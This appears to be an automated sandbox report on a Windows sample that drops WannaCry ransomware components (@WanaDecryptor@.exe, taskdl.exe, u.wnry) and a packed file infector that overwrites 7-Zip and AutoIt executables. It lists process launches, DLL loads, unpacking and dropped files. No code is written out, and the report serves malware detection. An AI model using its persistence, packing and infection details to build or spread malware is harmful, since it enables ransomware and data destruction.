Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: C:\Users\user\Desktop\taskdl.exe taskdl.exe	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Section loaded: msvcp60.dll	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: mfsrcsnk.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: mfplat.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: rtworkq.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: photometadatahandler.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Section loaded: version.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: moshost.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mapsbtsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mosstorage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ztrace_maps.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mapconfiguration.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\attrib.exe	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\icacls.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\cscript.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll
Source: C:\Users\user\Desktop\taskdl.exe	Section loaded: msvcp60.dll

Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Static file information: File size 3534848 > 1048576

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x34a000

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe

Unpacked PE file: 2.2.wBQInv.exe.410000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Code function: 0_2_00401A45 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00401A45

Source: initial sample

Static PE information: section where entry point is pointing to: ];Au~

Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Static PE information: section name: ];Au~
Source: wBQInv.exe.0.dr	Static PE information: section name: .aspack
Source: wBQInv.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ
Source: SciTE.exe.2.dr	Static PE information: section name: u
Source: MyProg.exe.2.dr	Static PE information: section name: PELIB
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_00407710 push eax; ret	0_2_0040773E
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_004076C8 push eax; ret	0_2_004076E6
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	Code function: 0_2_10006BD0 push eax; ret	0_2_10006BFE
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Code function: 2_2_00411638 push dword ptr [00413084h]; ret	2_2_0041170E
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Code function: 2_2_0041600A push ebp; ret	2_2_0041600D
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Code function: 2_2_00416014 push 004114E1h; ret	2_2_00416425
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Code function: 2_2_00412D9B push ecx; ret	2_2_00412DAB

Source: wBQInv.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.2.dr	Static PE information: section name: EpNuZ entropy: 6.934127987081906
Source: SciTE.exe.2.dr	Static PE information: section name: u entropy: 6.933138098125722
Source: MyProg.exe.2.dr	Static PE information: section name: Y\|uR entropy: 6.934398246996399

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\Desktop\m.vbs

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

File created: C:\Users\user\Documents\@WanaDecryptor@.exe

Jump to dropped file

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\Documents\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\Desktop\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\Desktop\u.wnry	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\Downloads\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\jones\AppData\Local\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\wBQInv.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\Temp\wBQInv.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\AppData\Local\@WanaDecryptor@.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\Desktop\taskdl.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Users\user\Desktop\taskse.exe	Jump to dropped file

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

File created: C:\Users\user\Desktop\u.wnry

Jump to dropped file

Source: C:\Users\user\Desktop\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Start Menu\~SDBE4D.tmp	Jump to behavior
